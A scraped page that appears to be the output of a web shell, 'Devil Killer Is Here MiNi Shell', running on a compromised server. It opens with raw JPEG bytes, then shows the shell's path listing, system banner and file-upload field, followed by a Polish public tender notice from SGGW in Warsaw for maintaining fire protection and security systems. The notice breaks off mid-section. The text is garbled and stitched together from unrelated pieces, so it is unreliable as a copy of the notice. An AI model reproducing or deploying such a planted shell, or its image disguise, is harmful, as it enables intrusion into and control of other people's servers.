JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250609/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250609/0026793101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Konserwacja systemów ochrony pożarowej i ochrony mienia oraz systemów oświetlenia awaryjnego i ewakuacyjnego w budynkach SGGW w Warszawie przez okres 12 miesięcy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA GŁÓWNA GOSPODARSTWA WIEJSKIEGO W WARSZAWIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Sekcja Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001784</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Nowoursynowska 166</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-787</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dint@sggw.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sggw.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Konserwacja systemów ochrony pożarowej i ochrony mienia oraz systemów oświetlenia awaryjnego i ewakuacyjnego w budynkach SGGW w Warszawie przez okres 12 miesięcy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a08b60de-562c-4924-b32c-23f16a518a52</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00267931</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a08b60de-562c-4924-b32c-23f16a518a52 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl oraz poczta elektroniczna</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na<br/>temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia<br/>określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>9. Sposób i forma sporządzenia dokumentów muszą być zgodne z wymaganiami określonymi w<br/>Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz.U. z 2020 r. poz. 2452), przepisami wydanymi na podstawie art. 18 ustawy z dnia 17<br/>lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020<br/>r. poz. 346, 568, 695, 1517 i 2320), a także Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów<br/>lub oświadczeń jakich może żądać zamawiający od wykonawcy (DZ. U. 2020 r. poz. 2415).<br/>10. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej,<br/>zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia<br/>16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021r.<br/>poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym<br/>i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument<br/>stanowiący tajemnicę przedsiębiorstwa”.<br/>11. Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za<br/>pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności<br/>przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj<br/>załącznik”). Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>dint@sggw.edu.pl, krzysztof_abramczyk@sggw.edu.pl nie dotyczy składania ofert).<br/>12. Wykaz poszczególnych informacji, dokumentów i oświadczeń składanych w postępowaniu oraz ich<br/>forma, sposób sporządzania i przekazywania zostały określone przez Zamawiającego w rozdz. XVI<br/>SWZ.<br/>13. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga<br/>posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-<br/>Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań<br/>dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>14. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po<br/>zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>15. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi<br/>150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>20<br/>16. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług<br/>Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin<br/>Platformy e-Zamówienia.<br/>17. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-<br/>Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem<br/>telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie<br/>internetowej https: //ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Szkoła Główna Gospodarstwa Wiejskiego w<br/>Warszawie, ul. Nowoursynowska 166, 02-787 Warszawa;<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym można skontaktować się pod<br/>adresem email: iod@sggw.edu.pl;<br/>3) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO oraz na<br/>podstawie przepisów ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z<br/>2023 r. poz. 1605), „ustawa Pzp”; w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego pn.: „Konserwacja systemów ochrony pożarowej i ochrony mienia oraz systemów<br/>oświetlenia awaryjnego i ewakuacyjnego w budynkach SGGW w Warszawie przez okres 12<br/>miesięcy”, prowadzonym w trybie podstawowym bez negocjacji, zawarciem umowy oraz jej<br/>realizacją oraz na podstawie art. 6 ust. 1 lit. f RODO. W przypadku przetwarzania danych<br/>osobowych na podstawie art. 6 ust. 1 lit. f) RODO za prawnie uzasadniony interes Administratora<br/>uznaje się:<br/>a) ustalenie lub dochodzenie przez Administratora roszczeń cywilnoprawnych wynikających z<br/>realizacji niniejszej Umowy, a także obrona przed takimi roszczeniami;<br/>b) weryfikacja danych osobowych w publicznych rejestrach.<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty upoważnione zgodnie z<br/>przepisami prawa powszechnie obowiązującego, którym udostępniona zostanie dokumentacja<br/>postępowania, w tym w szczególności w oparciu o art. 18 oraz art. 74 ustawy Pzp. Odbiorcami<br/>państwa danych będą: podmioty i organy, którym Administrator jest zobowiązany lub<br/>upoważniony udostępnić dane osobowe na podstawie powszechnie obowiązujących przepisów<br/>prawa, oraz podmioty, które na podstawie stosownych umów przetwarzają dane osobowe<br/>powierzone do przetwarzania przez Administratora w związku z realizacją usług gwarantujących<br/>należyte wykonanie niniejszej Umowy;<br/>5<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania Umowy przekracza<br/>4 lata, okres przechowywania obejmuje cały czas trwania Umowy. W przypadku zawarcia i<br/>realizacji Umowy obejmuje również okres niezbędny do zabezpieczenia ewentualnych roszczeń<br/>wynikających z Umowy, chyba, że przepisy szczegółowe stanowią inaczej;<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach ustawy Pzp w związku z art. 6 ust. 1 lit. c<br/>RODO związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>e) prawo do wniesienia sprzeciwu wobec przetwarzania danych osobowych, który administrator<br/>przetwarza na podstawie art. 6 ust. 1 lit. f RODO w związku z treścią pkt 3) i 5);:<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO, prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia<br/>wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu. Do<br/>obowiązków tych należą m.in. obowiązki wynikające z RODO, w szczególności obowiązek<br/>informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe<br/>dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Jednakże obowiązek<br/>informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim<br/>osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust. 4). Ponadto<br/>wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art. 14 RODO<br/>względem osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio<br/>pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust.<br/>5 RODO. W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony<br/>prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z<br/>udziałem wykonawcy w postępowaniu, Zamawiający zobowiązuje wykonawcę do złożenia w<br/>postępowaniu o udzielenie zamówienia publicznego oświadczenia o wypełnieniu przez niego<br/>obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO.<br/>11) Wzory oświadczeń wymaganych od wykonawcy w zakresie wypełnienia przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 RODO zostały uwzględnione we wzorze<br/>formularza ofertowego stanowiącego załącznik nr 1 do SWZ.<br/>12) Do spraw nieuregulowanych w SWZ mają zastosowanie przepisy ustawy – Prawo zamówień<br/>publicznych (Dz.U. z 2023 r. poz. 1605) oraz przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DINT.250.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> konserwacja w okresie 12 m-cy systemów SSP, oddymiania, Gazex i DSO w obiektach Szkoły<br/>Głównej Gospodarstwa Wiejskiego w Warszawie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas usunięcia awarii w obiekcie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> konserwacja w okresie 12 m-cy systemów ochrony mienia w obiektach Szkoły Głównej<br/>Gospodarstwa Wiejskiego w Warszawie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas usunięcia awarii systemu w obiekcie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> konserwacja w okresie 12 m-cy systemów oświetlenia awaryjnego i ewakuacyjnego w<br/>obiektach Szkoły Głównej Gospodarstwa Wiejskiego w Warszawie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas usunięcia awarii systemu w obiekcie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) ·nie 